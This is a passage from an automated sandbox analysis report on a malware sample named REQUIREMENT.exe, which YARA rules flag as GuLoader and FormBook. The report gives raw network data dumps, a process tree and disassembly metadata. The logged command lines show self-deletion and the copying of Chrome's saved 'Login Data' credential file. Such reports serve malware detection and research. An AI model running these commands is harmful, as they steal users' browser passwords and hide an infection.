94 b1 f5 85 4f 99 f7 11 a5 1c 4b 00 4b 6c 31 7d 6f 1a 19 9f 59 3d 29 f1 51 07 40 d4 5f b2 3c 6c 9a 0a da 5c 97 4f 98 17 3e fb 33 d7 dc 8c 38 95 e1 8d aa 57 2d 4c 08 8a 8a 85 36 fe 37 cc 21 d6 37 f3 b2 c9 e1 4c f0 f2 ba a3 f4 b9 07 Data Ascii: G3]xGl~fF.=CxC&f_u%=0fd)x6+*!&+5y&PuWy"`aUA}#Zy:vjc"M82MXa.g T5Le};tz6er\|WOKKl1}oY=)Q@_<l\O>38W-L67!7L
2021-10-13 13:52:05 UTC	678	IN	Data Raw: 5c 13 95 f6 51 ac 43 82 d6 44 cb 4b 9c 37 59 dc 0e 2b d0 47 2e f5 3b ce 89 39 a2 ec 98 0d fc 38 35 50 8e e6 16 da b1 9b 5b 7a 0e 19 30 73 60 e1 06 b6 48 d2 99 e6 12 23 8a 59 68 06 29 d1 e2 c2 fb b5 70 2d f2 50 d1 66 64 4f 66 a6 ae 4b e3 96 75 7e b7 d1 26 f9 79 d6 9a 7f 05 fd e3 ac 95 0d 6d 2c d2 10 7c 55 46 d9 25 15 c4 bc 6e b5 d1 2a 46 7d f9 49 cd b8 e2 40 09 dc 47 f0 e1 73 c1 10 d5 59 74 2a 13 73 31 58 c2 df cf 3d b2 f4 57 3b 72 49 fd 84 59 2d e9 25 46 3c 02 78 e0 0a 60 ab eb 71 85 69 8f 09 fe 3d 85 ec 79 4a 64 34 99 8c a2 ae 83 ef 9d 4e e0 9b d5 1c ad e8 27 cf 82 e1 6f 5b d2 c8 a6 5f a4 b5 41 74 5c 8e da fb c7 1c 13 3c 81 1e 56 12 0b c9 a3 47 f5 75 08 d8 e1 da b9 d5 04 81 0e 76 f1 eb 6c a2 f3 c5 dc a4 ee 4b 12 18 d9 1f 4e 09 6c 80 93 f1 b5 18 11 ca 68 Data Ascii: \QCDK7Y+G.;985P[z0s`H#Yh)p-PfdOfKu~&ym,\|UF%nF}I@GsYts1X=W;rIY-%F<x`qi=yJd4N'o[_At\<VGuvlKNlh
2021-10-13 13:52:05 UTC	679	IN	Data Raw: 44 d7 b2 5d bb c8 40 4e 86 57 81 a7 97 33 67 21 e0 55 bb f5 2f d7 67 50 b0 bc 5b 7a b0 15 67 6f bf 76 9c 0b 60 d0 ba 98 83 d9 f4 c6 6d a5 f3 17 9d 82 f6 48 ca 1f b1 aa c5 0e f9 a1 ce 90 2d 43 fc dd 66 aa f2 29 8a 04 6a 22 c3 57 93 30 79 3e b3 62 e8 46 42 db 52 3f e0 7e 2d 42 0e 58 02 85 ee 4f 6d 8e 3b c5 2e e5 33 6b 29 ba 1d 57 83 fa 54 63 bb dd 4b 89 eb 12 1f 95 27 c7 81 1c 28 3b 8a 67 8d 8d 1f 50 21 4e 30 30 55 3c 2a 42 d4 2d 9f 40 f1 b2 9f ec f4 10 9e ba b3 38 2a e3 27 17 45 99 d5 fd ef d9 fe 16 22 da c9 73 87 fc af 03 61 1f aa bb b4 92 2f 77 6d 23 37 45 92 03 bb 8d e8 f5 98 59 ae c6 eb 4e 8b 20 d3 7b ea c2 6a 71 41 ca 46 74 c0 d3 c5 48 86 0b f3 4f 08 91 d8 11 88 38 35 71 06 04 2c de a9 73 a1 4c ec 14 21 d1 5d f1 2e 70 8d 2d dd c7 c1 46 46 64 83 4d 10 Data Ascii: D]@NW3g!U/gP[zgov`mH-Cf)j"W0y>bFBR?~-BXOm;.3k)WTcK'(;gP!N00U<B-@8'E"sa/wm#7EYN {jqAFtHO85q,sL!].p-FFdM
2021-10-13 13:52:05 UTC	680	IN	Data Raw: 47 34 80 9a 04 b8 7d 09 2a cd a4 f1 59 6c 51 3e 50 d0 73 a4 da e3 23 1d 8a de 08 bf ca 5d a1 2d 4a 40 9f 32 55 8a fa 60 13 8f 8e 2d 87 e5 15 e0 44 a0 70 99 6f c7 2d 38 9f c5 f3 19 3b 37 fe a8 74 39 31 64 a7 aa 66 ef 11 91 9b f4 92 93 be 4d 6a 4e 98 55 4a 3c 68 d6 4a 49 2a a3 48 8a 29 a6 9b 4d 67 29 46 ba 42 92 64 ee 3c af e4 31 d2 89 4c ed 8c 56 ab 20 74 b0 02 28 89 57 00 e3 5a 0c 47 0a da 3a af 99 10 92 87 98 b6 94 61 fb 2f b6 d6 07 40 c5 b0 0c 2a 28 e9 5e 42 dd fe df b4 33 13 ae 49 52 a9 f4 db 15 dd 46 ee 2c 30 71 59 eb c5 11 ce b7 e5 00 46 0e 7f b5 3c 10 da 93 85 32 44 20 2e 86 ff 14 c3 7c 86 0b ad 40 1b ba 3b 7f 0c 7f 80 fc 7a 77 5a 0a e3 c1 da e7 89 f2 aa 22 48 50 2a 16 72 57 8c bb b0 ee 7b 2c d4 f0 6d 0d 41 80 ec 04 36 7d 13 ef 53 77 ae f9 f5 f0 fb Data Ascii: G4}YlQ>Ps#]-J@2U`-Dpo-8;7t91dfMjNUJ<hJIH)Mg)FBd<1LV t(WZG:a/@(^B3IRF,0qYF<2D .\|@;zwZ"HPrW{,mA6}Sw
2021-10-13 13:52:05 UTC	682	IN	Data Raw: 73 73 73 c8 15 e8 06 b2 91 31 19 bb 31 f0 df 2e f1 3c 1a f5 72 61 38 a9 4a 6d a1 75 4a 83 3d 3c 62 86 4f b6 21 ee f0 b2 89 38 5a 02 59 37 80 ab ad f7 3f df dc f2 36 01 22 a8 e3 54 d5 2f 66 b6 a1 68 a1 c9 7e 8c b9 ca 35 2f 79 e6 85 af 39 67 da e4 70 b5 34 36 0a 1f a7 22 91 4d 79 49 10 88 60 e6 2c 6a e4 9c b5 f1 98 73 23 8f ea 81 b7 8b 26 69 fe c2 db ea e2 e8 51 e9 8c b9 54 bd 8d e1 ea b2 91 a9 79 8e 70 4e 03 1f 1d 05 97 ca 3c 7e 3b 15 b0 3c bd 02 d9 cd b2 18 00 5c b7 8c 97 24 18 f9 cd 9c 58 45 3b 8d 63 8a 47 83 dc 65 67 3a cd 3c 51 f8 54 20 b4 9c 1f 4e eb 7e 56 f0 76 1a 61 72 f0 06 96 ba ae d2 2f 52 a2 52 18 67 89 a3 81 1d ca 5a 0f 8f 0d 86 17 b6 e8 d2 22 b0 24 54 70 f9 44 5e 16 b4 30 14 d5 79 3e 15 70 ba 5a 59 96 2c a3 56 62 d6 22 e2 2a 31 db 2b 12 b6 b3 Data Ascii: sss11.<ra8JmuJ=<bO!8ZY7?6"T/fh~5/y9gp46"MyI`,js#&iQTypN<~;<\$XE;cGeg:<QT N~Vvar/RRgZ"$TpD^0y>pZY,Vb"*1+
2021-10-13 13:52:05 UTC	683	IN	Data Raw: a6 e5 68 e3 7c 9e 55 b5 6b 99 2f 94 46 7b 4b 14 e9 61 99 fb 0a 1e af f5 b6 54 1c 12 76 4b b3 69 a3 28 32 59 76 08 fd b9 8a 7c 25 ee 0c c2 05 f3 a4 d3 13 dc 24 98 3a b9 14 99 8c 93 f6 b5 6f 4f fd 66 c9 d8 fb 6f d7 19 b3 77 1a 88 4e 96 53 d9 71 7d 7e cb d1 69 ef f3 cd a9 b1 c5 45 35 88 98 f1 03 8b 13 72 12 f8 d2 87 48 e9 c1 d6 26 8b 01 7b 6a 7d 69 f8 7a 9e d4 66 85 a3 09 4e 2b 83 93 d8 45 1f d2 6c 6a e8 ea 88 33 c6 75 05 db da d9 02 50 e9 7c af ae 14 9f 4f 9d 27 84 37 8e 15 8a da b6 3b 0f 9e 3f b7 54 75 be 4e d8 a3 d2 f0 9e 3f f1 70 2e ad 76 b6 8c ee 30 ea 21 08 35 8e 96 d6 59 b8 c9 dc 4d c6 5f df 67 a2 06 32 ca 5b 94 06 d7 03 d9 9b 99 33 8a 3d f7 c9 74 5b 47 43 ca 07 04 94 14 69 17 93 2c 78 19 18 1a 17 bc 85 bf 19 c7 d7 7b 29 16 07 05 3a b1 59 96 fd de 10 Data Ascii: h\|Uk/F{KaTvKi(2Yv\|%$:oOfowNSq}~iE5rH&{j}izfN+Elj3uP\|O'7;?TuN?p.v0!5YM_g2[3=t[GCi,x{):Y
2021-10-13 13:52:05 UTC	684	IN	Data Raw: 7e e7 b1 4f a3 01 01 d6 8c 99 e9 99 00 00 72 50 6c 63 97 3f 08 b0 9e 19 e9 6f 9d 25 0a e3 3b e6 ee c3 4d f4 f8 83 a0 bb a1 45 ff 90 33 ea f1 d2 02 e3 b2 ba c0 54 ed 31 a6 fa da 8c 9a 11 8e f5 1c 69 02 23 46 ff 31 a4 c2 1c 1a 1a 88 73 84 30 c9 6f 32 c4 17 e3 e4 e9 7d fc d2 73 ee d3 09 a6 54 68 0a c5 ff fc 8a d3 19 87 b3 76 ee 6e f9 10 80 06 17 e7 da 6d 28 29 31 94 1a 10 8a ad 80 97 bf 91 d8 a2 6a 2a 9e 19 5e cb 75 eb 80 1f 27 d1 d2 6f d2 25 b0 fc 56 34 8d 4a a7 35 68 8a a3 89 d8 e3 6a 90 b4 12 70 10 f0 da 1b fe 86 20 81 5d a6 7b 4c b8 b3 02 da 5d 7d 0a 84 d7 c9 2a a5 de 51 1d 59 48 4c 22 c0 34 d4 5a 02 58 3c 0b 3e 0f 87 9f ac 7a 28 6f 5c 84 f8 2c 83 bc b8 fd 7f ec aa 39 f1 de 15 18 2d e4 72 15 97 3b f6 0e 85 5f e5 3f 39 53 84 c4 be bf 76 7a 39 27 2e b8 af Data Ascii: ~OrPlc?o%;ME3T1i#F1s0o2}sThvnm()1j^u'o%V4J5hjp ]{L]}QYHL"4ZX<>z(o\,9-r;_?9Svz9'.

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: REQUIREMENT.exe PID: 1776 Parent PID: 4332

General

Start time:	15:46:29
Start date:	13/10/2021
Path:	C:\Users\user\Desktop\REQUIREMENT.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\REQUIREMENT.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	FB70FF484021669624233D0FBD77EC6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: REQUIREMENT.exe PID: 1172 Parent PID: 1776

General

Start time:	15:46:49
Start date:	13/10/2021
Path:	C:\Users\user\Desktop\REQUIREMENT.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\REQUIREMENT.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	FB70FF484021669624233D0FBD77EC6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 680 Parent PID: 1172

General

Start time:	15:47:09
Start date:	13/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff632640000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	moderate

Chronological Activities

Analysis Process: autoconv.exe PID: 5024 Parent PID: 680

General

Start time:	15:47:24
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autoconv.exe
Imagebase:	0xe0000
File size:	851968 bytes
MD5 hash:	469594005E3B94C5945BCCE7FC521C05
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: autochk.exe PID: 5612 Parent PID: 680

General

Start time:	15:47:24
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\autochk.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autochk.exe
Imagebase:	0x100000
File size:	875008 bytes
MD5 hash:	95127C028063423E1253BD0C8CD6C9CB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: systray.exe PID: 2092 Parent PID: 680

General

Start time:	15:47:25
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\systray.exe
Imagebase:	0x5f0000
File size:	9728 bytes
MD5 hash:	28D565BB24D30E5E3DE8AFF6900AF098
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.37539395229.0000000004EB7000.00000004.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.37529342478.0000000002A26000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2492 Parent PID: 2092

General

Start time:	15:47:28
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\REQUIREMENT.exe'
Imagebase:	0x500000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 1196 Parent PID: 2492

General

Start time:	15:47:28
Start date:	13/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff67b510000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7420 Parent PID: 2092

General

Start time:	15:51:01
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Imagebase:	0x500000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 5608 Parent PID: 7420

General

Start time:	15:51:01
Start date:	13/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff67b510000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: firefox.exe PID: 3076 Parent PID: 2092

General

Start time:	15:51:01
Start date:	13/10/2021
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Mozilla Firefox\Firefox.exe
Imagebase:	0x7ff7f0c20000
File size:	597432 bytes
MD5 hash:	FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000015.00000000.35242814301.0000000027517000.00000004.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000015.00000002.35248315859.0000000027517000.00000004.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000015.00000000.35190394827.0000000027517000.00000004.00020000.sdmp, Author: Florian Roth

Chronological Activities

Analysis Process: certmgr3ff.exe PID: 1444 Parent PID: 680

General

Start time:	15:51:03
Start date:	13/10/2021
Path:	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	FB70FF484021669624233D0FBD77EC6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: certmgr3ff.exe PID: 7460 Parent PID: 680

General

Start time:	15:51:09
Start date:	13/10/2021
Path:	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	FB70FF484021669624233D0FBD77EC6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000002.35540305146.0000000002290000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: certmgr3ff.exe PID: 7840 Parent PID: 680

General

Start time:	15:51:18
Start date:	13/10/2021
Path:	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	FB70FF484021669624233D0FBD77EC6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000019.00000002.35598358285.00000000022C0000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: certmgr3ff.exe PID: 2676 Parent PID: 1444

General

Start time:	15:51:23
Start date:	13/10/2021
Path:	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	FB70FF484021669624233D0FBD77EC6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001A.00000002.35647851056.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: certmgr3ff.exe PID: 6616 Parent PID: 7460

General

Start time:	15:51:36
Start date:	13/10/2021
Path:	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	FB70FF484021669624233D0FBD77EC6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001B.00000002.35777303082.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: certmgr3ff.exe PID: 4776 Parent PID: 7840

General

Start time:	15:51:42
Start date:	13/10/2021
Path:	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	FB70FF484021669624233D0FBD77EC6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001C.00000002.35818096692.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: REQUIREMENT.exe PID: 1776 Parent PID: 4332 REQUIREMENT.exeCOMMON

Executed Functions

Function 023BA25C, Relevance: 16.7, APIs: 2, Strings: 7, Instructions: 941COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 1029625771-2385936248
Opcode ID: 63315520c0dcf31af8cbedf9c549b6944a058895431bc129b28afde1b558e0ff
Instruction ID: c0592179829258dab12dc17b3ddfc578aced1cd88b0ceadf80eb6710ef53e7dc
Opcode Fuzzy Hash: 63315520c0dcf31af8cbedf9c549b6944a058895431bc129b28afde1b558e0ff
Instruction Fuzzy Hash: 6E92FCB2604389DFDB759F34CD457EABBB2BF98310F41812ADD899BA14D3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B58A9, Relevance: 14.7, APIs: 1, Strings: 7, Instructions: 717COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 8154a7fa034d4a4f1d74c0d3b934cd309a29435ae7913f7a6d9b0c3ba62195cd
Instruction ID: 381e3eb43a661387945d0d2c7729ef29ecc3288f2b482c899cd402915e944425
Opcode Fuzzy Hash: 8154a7fa034d4a4f1d74c0d3b934cd309a29435ae7913f7a6d9b0c3ba62195cd
Instruction Fuzzy Hash: 2F62FBB26043898FDB758F38CD457DABBB2FF59310F458129DD899BA25D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B5F15, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 631nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 023B94E5: LoadLibraryA.KERNELBASE(?,74943F2C,?,023B772D,07B490AF), ref: 023B9684

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 3569954152-2385936248
Opcode ID: 516e986ebba682263780b2004120be967533945b5c9521a3626693da7e772015
Instruction ID: fb43efac7b2663ccdad828eae540279d42990a8bbb3affe526fd13ac9c9754e1
Opcode Fuzzy Hash: 516e986ebba682263780b2004120be967533945b5c9521a3626693da7e772015
Instruction Fuzzy Hash: 0252EBB26042899FDB758F39CD457DABBB2FF98310F41812ADD499BA24D7309A81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 023B5EFD, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 622COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: ccf08b296c991997286519c6724c31e393d15f1ded1e3030248a2d733a5d2aaa
Instruction ID: c3f89938aee4121c5bfc49495c5d8ea1e1a12b909aadab87cacfccb75522b1bd
Opcode Fuzzy Hash: ccf08b296c991997286519c6724c31e393d15f1ded1e3030248a2d733a5d2aaa
Instruction Fuzzy Hash: CB52EAB2604289DFDB758F38CD457DABBB6FF98310F41812ADD499BA24D3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B5EC3, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 618COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
KV, xrefs: 023B6577
k/\, xrefs: 023B62E6

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: b3e7a64d2e2280b7d49c8b7f69e67f1be8ab205b489057398aafd6c8851bd922
Instruction ID: e3810ddafba9269f09d99a442e7dd6ff1c1eb77daa423bab1c7907b2364c4222
Opcode Fuzzy Hash: b3e7a64d2e2280b7d49c8b7f69e67f1be8ab205b489057398aafd6c8851bd922
Instruction Fuzzy Hash: 7252EAB2604289DFDB759F38CD457DABBB2FF98310F41812ADD499BA24D3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 023B5ECD, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 617COMMON

Download Yara Rule

Strings

w2%h, xrefs: 023B61EC
$M, xrefs: 023B6E9E
`1, xrefs: 023B633D
i&Hh, xrefs: 023B63EF
d-, xrefs: 023B6C1F
